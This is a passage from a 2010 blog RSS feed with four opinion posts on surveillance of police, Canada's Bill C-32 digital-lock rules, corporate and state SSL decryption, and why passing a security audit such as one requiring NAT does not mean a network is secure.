<p>Fast forward to now.  Everyone has a video camera or picture camera on them as a result of mobile phones.  If you are serious about it, you can find all kinds of <a href="http://www.spycamman.com/">tiny</a> spy <a href="http://www.spycameras.com/">cameras</a>.  <a href="http://eyeborgproject.com">Rob Spence has implanted a camera in his eye.</a> It amuses me when law enforcement gets all concerned about citizens taking their picture and videotaping them.  I guess they feel that they should be able to watch and monitor us, but we shouldn&#8217;t be able to watch and monitor them.  Of course, if they are not doing anything wrong, then they should have nothing to worry about, right? (That statement is an entire topic in and of itself.)</p>
<p>Everyone has reasons why a particular person or group of people should or should not be monitored.  It really comes down to the basic premise that we as humans don&#8217;t want to be monitored, but we want the ability to monitor others, especially if we deem them a threat.  Government wants the ability to covertly monitor its citizens but does not want organizations covertly monitoring it.  Police want cameras everywhere so they can monitor what is going on and use it to assist with their job, but <a href="http://www.usatoday.com/news/opinion/editorials/2010-07-15-editorial15_ST1_N.htm">they don&#8217;t want to be videotaped</a> in <a href="http://www.washingtonpost.com/wp-dyn/content/article/2010/06/20/AR2010062002532.html">case</a> they get caught doing something controversial, such as <a href="http://www.youtube.com/watch?v=IPe_hf7aBXM">Robert Dziekanski</a> being killed by officers at Vancouver airport.  The video, once released on the Internet, forced police to <a href="http://www.youtube.com/watch?v=o5k7CmAENHo">change their story</a>.  Businesses feel they have a right to monitor their employees, but would have concerns if employees were monitoring some of their activities.</p>
<p>Personally, I think it is futile to attempt to stop one group from monitoring another, especially in public places.  It will never be successful.  Who do you feel should be able to monitor who?   Under what circumstances and conditions is video or audio surveillance appropriate?</p>
<p style="text-align: right;"><a href="http://www.flickr.com/photos/alsiafy/53295600/in/photostream/"><em>photo credit</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/07/16/i-am-watching-you-but-you-cant-watch-me/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bill C-32, digital locks, and my concerns</title>
		<link>http://michaeldundas.com/2010/06/24/bill-c-32-digital-locks-and-my-concerns/</link>
		<comments>http://michaeldundas.com/2010/06/24/bill-c-32-digital-locks-and-my-concerns/#comments</comments>
		<pubDate>Thu, 24 Jun 2010 19:57:06 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Copyright]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=1871</guid>
		<description><![CDATA[I am not a lawyer, nor am I a politician or a copyright expert.   I have been following the copyright debate quite religiously for the last 3-4 years, trying to learn what I can.  In Canada Bill C-32 has been tabled to update the copyright laws.  There has been lots of discussion about the Bill, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/06/smithAndWessonFirearm1.png"><img class="alignright size-full wp-image-1874" title="smithAndWessonFirearm1" src="http://michaeldundas.com/wp-content/uploads/2010/06/smithAndWessonFirearm1.png" alt="" width="350" height="280" /></a>I am not a lawyer, nor am I a politician or a copyright expert.   I have been following the copyright debate quite religiously for the last 3-4 years, trying to learn what I can.  In Canada Bill C-32 has been tabled to update the copyright laws.  There has <a href="http://www.michaelgeist.ca/content/view/5141/125/">been</a> lots of <a href="http://www.michaelgeist.ca/content/view/5139/125/">discussion</a> <a href="http://www.michaelgeist.ca/content/view/5138/125/">about</a> the Bill, specifically around the digital lock rules in this bill.   Big industry wants to protect their materials, by making it illegal to remove digital locks, for any reason whatsoever, without permission of the copyright owner.  It also seems that it is illegal to publish tools that would assist others to break digital locks.  Both of these issues concern me.</p>
<p>See, I do research into security technologies as part of my job.  Security is also a personal interest of mine.  As an example, I am currently looking into a particular application that uses SSL to encrypt the data between points.  In order to do what I need to do for the research, I downloaded an open source tool that basically breaks the SSL.  This allows me to work on my research with the application in question.  If that tool was not published due to Bill C-32, then that stops me from doing my research.  I suppose I could create my own version of the tool, but why would I do that if someone already has a tool readily available?  It makes no sense.  The most likely response to my specific example is that SSL isn&#8217;t proprietary, so it does not matter.  That is true in this case, but what about when I am evaluating a Blackberry PDA or an iPhone?  I suspect RIM and Apple might not take too kindly to me exposing problems in their software.  See, the current Bill C-32 might allow them to do this.  That is bad for security, bad for keeping companies honest.</p>
<p>I think it makes more sense to punish those that use the tools in a wrong way.  If someone was to take the tool, and use it in a botnet to extract credit card information, then the individuals that did this are guilty and should be charged.  The person that made the tool is not the guilty party.  It is like making <a href="http://www.smith-wesson.com">Smith &amp; Wesson</a> responsible because they created the firearm that was used in a murder.</p>
<p>Overall, I think Bill C-32 has made much progress from the previous bills in Canada.  My hope is that the Government starts to do their job and properly debate the bill and get input from all interested parties, <a href="http://www.michaelgeist.ca/content/view/5138/125/">not label people that question them as extremists</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/06/24/bill-c-32-digital-locks-and-my-concerns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SSL Decryption is becoming the norm</title>
		<link>http://michaeldundas.com/2010/06/22/ssl-decryption-is-becoming-the-norm/</link>
		<comments>http://michaeldundas.com/2010/06/22/ssl-decryption-is-becoming-the-norm/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 15:23:20 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Privacy and Anonymity]]></category>
		<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=1838</guid>
		<description><![CDATA[A couple of years ago I was at a client&#8217;s site in Dubai.  The client was a telco, and I was doing some security consulting for them.  Like many countries in the Middle East, Dubai actively monitors data entering and leaving the country.  Privacy laws, as far as I could determine, do not exist.  All [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/06/eavesdroppingOnApartmentDoor.png"><img class="alignright size-full wp-image-1860" title="eavesdroppingOnApartmentDoor" src="http://michaeldundas.com/wp-content/uploads/2010/06/eavesdroppingOnApartmentDoor.png" alt="" width="211" height="320" /></a>A couple of years ago I was at a client&#8217;s site in Dubai.  The client was a telco, and I was doing some security consulting for them.  Like many countries in the Middle East, Dubai actively monitors data entering and leaving the country.  Privacy laws, as far as I could determine, do not exist.  All internet communications are actively monitored.  It is quite common to suddenly see a web page pop up explaining in Arabic that the site you are trying to view is not authorized and you have been denied.  Telcos there have spent millions of dollars on infrastructure in order to enforce these requirements.  The design is not as complex as one might think, just resource intensive.  Resources are required to process the data in real time, and staff are required to maintain the infrastructure, look into events and perform other tasks.  Telcos do this because it is required by law.  You can not obtain a license as a telco unless you have monitoring capabilities deployed.</p>
<p>My first day in Dubai, I went to lunch with one of the executives of the telco.  During our lunch, I asked him how they manage encrypted connections.  He explained that they were currently getting ready to deploy a solution to solve that.  The infrastructure was being upgraded to decrypt all SSL sessions and parse the data as required.  Aside from opening my eyes to the difference in privacy between North America and the Middle East, I found it interesting that SSL decrypting was so easily available.  Previously, I had seen software that law enforcement used for this purpose.  I myself had done it for clients using available tools during an engagement.  But these tools were designed more for targeted surveillance, not mass scale.  Like all technology, it improves and gets less expensive over time, I guess.</p>
<p>Today, there are many more companies in North America and abroad that either have deployed SSL decrypting capabilities or are in the process of doing so.  Security, diagnostics, audit and legal requirements to know what is entering and leaving their networks, and to be able to log and trace back data transmissions to the originator, are some of the reasons.  One driver is Data Leakage Protection (DLP), currently a very &#8216;hot&#8217; topic with many new vendors jumping on the opportunity with solutions.  In order to look for data leakage, you need to see past any encryption that might be present.  <a href="http://cisco.com/">Cisco</a>, <a href="http://www.bluecoat.com/">Bluecoat</a>, <a href="http://www.paloaltonetworks.com/">PaloAlto</a>, <a href="http://www.fortinet.com/">Fortinet</a> are just a few companies that offer products for SSL decryption.</p>
<p>With Google deploying encryption for <a href="https://gmail.com">Gmail</a> and more recently <a href="https://www.google.com/">searching</a>, and plug-ins such as the <a href="http://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extension">EFF Firefox plug-in</a> to help secure your communications, companies are feeling more and more concerned about what data is coming and going.  What worries me is that all these security, legal and audit requirements companies face are actually not helping them in the long run.  If these companies are decrypting SSL sessions that egress and ingress their network, you can be sure that other companies are doing the same to theirs.  The net result is that everything is decrypted and no one has any privacy.</p>
<p>Next time you connect to your bank, doctor&#8217;s office, insurance company, Gmail or any site and see secure indications from your browser similar to these <a href="http://michaeldundas.com/wp-content/uploads/2010/06/httpsGmailURL.png"><img class="aligncenter size-full wp-image-1856" title="httpsGmailURL" src="http://michaeldundas.com/wp-content/uploads/2010/06/httpsGmailURL.png" alt="" width="284" height="27" /></a><a href="http://michaeldundas.com/wp-content/uploads/2010/06/firefoxSSLLock.png"><img class="aligncenter size-full wp-image-1857" title="firefoxSSLLock" src="http://michaeldundas.com/wp-content/uploads/2010/06/firefoxSSLLock.png" alt="" width="110" height="22" /></a></p>
<p>along with the company&#8217;s reassurances that the site is secure, keep in mind things may not be as they appear &#8211; today even more so than yesterday.</p>
<p>Do you deploy any type of decryption on your network?  If it is deployed are you aware of it?</p>
<p style="text-align: right;"><a href="http://www.flickr.com/photos/joehowell/2314400543/"><em>photo credit</em></a></p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/06/22/ssl-decryption-is-becoming-the-norm/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Passing an audit does not imply you are secure</title>
		<link>http://michaeldundas.com/2010/05/31/passing-an-audit-does-not-imply-you-are-secure/</link>
		<comments>http://michaeldundas.com/2010/05/31/passing-an-audit-does-not-imply-you-are-secure/#comments</comments>
		<pubDate>Mon, 31 May 2010 22:53:24 +0000</pubDate>
		<dc:creator>Clear2Go</dc:creator>
				<category><![CDATA[Auditing]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://michaeldundas.com/?p=1801</guid>
		<description><![CDATA[I have been reading up on a few of the auditing standards such as COBIT and PCI.   I have dealt with audits at clients in the past.  Financial institutions take them very seriously.  Given the nature of their business and the recent financial crisis last year this approach makes complete sense. There is a need [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://michaeldundas.com/wp-content/uploads/2010/02/checkList.png"><img class="alignright size-full wp-image-1534" title="checkList" src="http://michaeldundas.com/wp-content/uploads/2010/02/checkList.png" alt="" width="215" height="143" /></a>I have been reading up on a few of the auditing standards such as COBIT and PCI.   I have dealt with audits at clients in the past.  Financial institutions take them very seriously.  Given the nature of their business and the recent financial crisis last year this approach makes complete sense.</p>
<p>There is a need to ensure audit compliance across the entire banking infrastructure.  From a financial perspective, compliance with the various audits is a must if you wish to stay in business.  Of course, my background is in network security.  Network security is not the same as auditing.  Although I have not met anyone that would say if you pass a particular set of audits you are secure, I have noticed across the audit industry in general there seems to be an unstated understanding that if you do pass audits you are secure, or more secure than if you don&#8217;t.</p>
<p>Passing an audit does not mean you are secure.  Here is one of a few simple examples I have come across.  One of the audits requires that your entire internal network has address translation from inside to outside.  Effectively, the idea is that if I as an outside user browse to http://michaeldundas.com, that address would appear to the requester as 216.240.0.43.</p>
<p><a href="http://michaeldundas.com/wp-content/uploads/2010/05/clientToServerDirect.png"><img class="aligncenter size-full wp-image-1803" title="clientToServerDirect" src="http://michaeldundas.com/wp-content/uploads/2010/05/clientToServerDirect.png" alt="" width="770" height="254" /></a></p>
<p>From the quick diagram above, you can see how the client thinks that it is directly connected to 216.240.0.43/32, and it is.  Based on the audit requirement of having complete address translation with the untrusted Internet, you would have to configure a device that would convert the IP address the client sees to a different IP address.</p>
<p><a href="http://michaeldundas.com/wp-content/uploads/2010/05/clientToServerNAT.png"><img class="aligncenter size-full wp-image-1805" title="clientToServerNAT" src="http://michaeldundas.com/wp-content/uploads/2010/05/clientToServerNAT.png" alt="" width="782" height="305" /></a></p>
<p>The second diagram shows a router configured with Network Address Translation (NAT) to convert the IP address in both directions.  In this way the client does not know the real IP address of the server.  Any attack that you could do without NAT, you can do even if NAT is there.  Anyone that is active in attacking servers knows this.  It offers no additional security, just extra work.</p>
<p>Auditing does have its place and is necessary.  Complying with audit requirements for many industries is not optional, and your staff must understand that.  But don&#8217;t let yourself or your staff be fooled into thinking audits make you more secure.  Audits help, but they are not a substitute for good and proper security.  Passing an audit does not mean you are secure.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaeldundas.com/2010/05/31/passing-an-audit-does-not-imply-you-are-secure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

